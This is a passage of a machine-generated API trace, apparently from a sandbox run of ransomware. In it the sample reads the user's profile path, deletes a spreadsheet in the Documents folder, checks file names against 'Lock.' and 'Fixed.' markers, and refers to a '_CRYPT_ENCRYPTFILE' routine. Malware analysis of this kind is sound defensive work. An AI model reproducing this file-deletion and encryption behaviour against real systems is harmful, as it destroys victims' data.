lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0265.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0265.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0265.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0265.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0265.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0265.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0265.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0265.693] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/lC9iCEh8edFMc0F.xlsx", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\lC9iCEh8edFMc0F.xlsx", lpFilePart=0x8cedf4*="lC9iCEh8edFMc0F.xlsx") returned 0x2e [0265.693] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\lC9iCEh8edFMc0F.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\lc9iceh8edfmc0f.xlsx")) returned 0x20 [0265.693] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\lC9iCEh8edFMc0F.xlsx", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1de04d10, ftCreationTime.dwHighDateTime=0x1d57ac6, ftLastAccessTime.dwLowDateTime=0xdc073890, ftLastAccessTime.dwHighDateTime=0x1d5b738, ftLastWriteTime.dwLowDateTime=0xdc073890, ftLastWriteTime.dwHighDateTime=0x1d5b738, nFileSizeHigh=0x0, nFileSizeLow=0x9adc, dwReserved0=0x1, dwReserved1=0x1c, cFileName="lC9iCEh8edFMc0F.xlsx", cAlternateFileName="LC9ICE~1.XLS")) returned 0xa87110 [0265.694] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\lC9iCEh8edFMc0F.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\lc9iceh8edfmc0f.xlsx")) returned 1 [0265.698] FindNextFileW (in: hFindFile=0xa87110, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1de04d10, ftCreationTime.dwHighDateTime=0x1d57ac6, ftLastAccessTime.dwLowDateTime=0xdc073890, ftLastAccessTime.dwHighDateTime=0x1d5b738, ftLastWriteTime.dwLowDateTime=0xdc073890, ftLastWriteTime.dwHighDateTime=0x1d5b738, nFileSizeHigh=0x0, nFileSizeLow=0x9adc, dwReserved0=0x1, dwReserved1=0x1c, cFileName="lC9iCEh8edFMc0F.xlsx", cAlternateFileName="LC9ICE~1.XLS")) returned 0 [0265.698] FindClose (in: hFindFile=0xa87110 | out: hFindFile=0xa87110) returned 1 [0265.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0265.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0265.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0265.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0265.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0265.698] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0265.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0265.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0265.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0265.698] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0265.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0265.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0265.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0265.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0265.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0265.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0265.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0265.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0265.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0265.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0265.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0265.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0265.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0265.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0265.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0265.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0265.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0265.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0265.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0265.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0265.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0265.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x5e) returned 0x2e558d8 [0265.700] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/lC9iCEh8edFMc0F.xlsx", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\lC9iCEh8edFMc0F.xlsx", lpFilePart=0x8cf650*="lC9iCEh8edFMc0F.xlsx") returned 0x2e [0265.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0265.700] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\lC9iCEh8edFMc0F.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\lc9iceh8edfmc0f.xlsx")) returned 0xffffffff [0265.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0265.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0265.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0265.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0265.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0265.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0265.700] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0265.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0265.700] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0265.700] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0265.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0265.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0265.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0265.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0265.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0265.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0265.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0265.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0265.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0265.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0265.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0265.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0265.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0265.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Lci9q.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0265.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ci9q.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0265.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i9q.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0265.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9q.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0265.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="q.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0265.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0265.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0265.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0265.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0265.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0265.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0265.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0265.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0265.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0265.702] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0265.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0265.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0265.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0265.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0265.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0265.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0265.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0265.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0265.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0265.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0265.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0265.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0265.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0265.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0265.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0265.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0265.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0265.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0265.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x16) returned 0x2e69b08 [0265.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0265.703] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Lci9q.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0265.703] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ci9q.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0265.703] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i9q.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0265.703] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9q.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0265.703] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="q.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0265.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0265.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0265.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0265.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0265.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0265.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0265.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0265.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0265.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0265.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0265.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0265.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0265.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0265.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0265.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0265.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0265.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0265.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0265.703] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0265.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0265.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0265.704] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0265.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0265.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0265.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0265.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bc8 [0265.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0265.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0265.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0265.704] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0265.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0265.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0265.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0265.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0265.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69888 [0265.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0265.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0265.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0265.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0265.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0265.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0265.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0265.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0265.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0265.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0265.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0265.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0265.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0265.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ba8 [0265.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0265.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0265.717] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0265.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0265.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0265.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0265.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0265.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0265.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0265.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e558d8 [0265.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0265.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0265.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0265.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0265.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0265.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0265.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0265.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0265.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0265.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b88 [0265.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0265.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0265.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0265.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0265.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c08 [0265.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0265.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0265.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0265.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51628 [0265.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0265.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0265.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0265.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0265.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0265.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0265.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0265.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547d8 [0265.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0265.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0265.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0265.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0265.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0265.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0265.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54698 [0265.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0265.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0265.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0265.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54828 [0265.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0265.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0265.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546c0 [0265.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0265.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0265.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0265.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0265.719] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0265.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0265.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0265.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0265.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0265.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546e8 [0265.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0265.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0265.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0265.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0265.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0265.720] RtlAllocateHeap 